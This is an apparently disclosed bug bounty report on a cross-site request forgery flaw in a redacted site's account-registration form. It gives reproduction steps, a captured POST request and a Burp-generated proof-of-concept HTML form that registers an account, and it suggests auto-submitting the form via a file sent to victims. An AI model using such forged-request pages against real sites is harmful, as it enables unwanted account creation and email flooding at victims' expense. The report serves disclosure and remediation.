CSRF in https://███
Medium
Vulnerability Details
Summary:-
---------
Cross-Site Request Forgery (CSRF)
## Impact
1-The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
2-send many request via server i mean request to server and response of server
which lead to dos attacks or full the emails of users with message which may select as spam from security of email .
3-Sending a lot of messages may lead to the running out of the website's subscription services to its email server to users or losing the site a lot of money for thousands of activation messages
## System Host(s)
█████████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Steps:-
--------
1-go to https://█████████
2-full input
3-intercept request using burp suite
Request:-
-------------
```
POST /███████ HTTP/1.1
Host: ████████
Connection: close
Content-Length: 9860
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://████
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://█████
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
███
```
4-generate csrf poc code and sava it as html file
code:-
----------
````
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://█████████" method="POST">
<input type="hidden" name="ctl00_ToolkitScriptManager1_HiddenField" value="" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxFirstName" value="df" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Email" value="dsafhdsk@gmail.com" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxLastName" value="addfsag" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxConfirmEmail" value="dsafhdsk@gmail.com" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxAddress1" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxPhoneNumber" value="████████" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxAddress2" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxCellPhone" value="███████" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxCity" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxOrganizationName" value="dfs" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$dropDownListState" value="KS" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxJobTitle" value="dsf" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxZipCode" value="11311" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$dropDownListSector" value="Federal" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$UserName" value="cairoer55" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Password" value="Asdfgh123456@" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$ConfirmPassword" value="Asdfgh123456@" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Question" value="What was your high school mascot?" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Answer" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$checkBoxAcceptDisclaimer" value="on" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$__CustomNav0$StepNextButton" value="Create User" />
<input type="hidden" name="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" value="████" />
<input type="hidden" name="__VIEWSTATEGENERATOR" value="6D58E96E" />
<input type="hidden" name="__VIEWSTATEENCRYPTED" value="" />
<input type="hidden" name="__EVENTVALIDATION" value="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" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
````
5-open it in another browser and submit as you see
```
Your account has been created, but before you can login you must first verify your email address. A message has been sent to the email address you specified. Please check your email inbox and follow the instructions in that email to verify your account.
```
you can make code with auto submit scriot to excuted without and action of victem
only victem click on html file which can send to him via facebook or email.
## Suggested Mitigation/Remediation Actions
put csrf token
Actions
View on HackerOneReport Stats
- Report ID: 1090838
- State: Closed
- Substate: resolved
- Upvotes: 14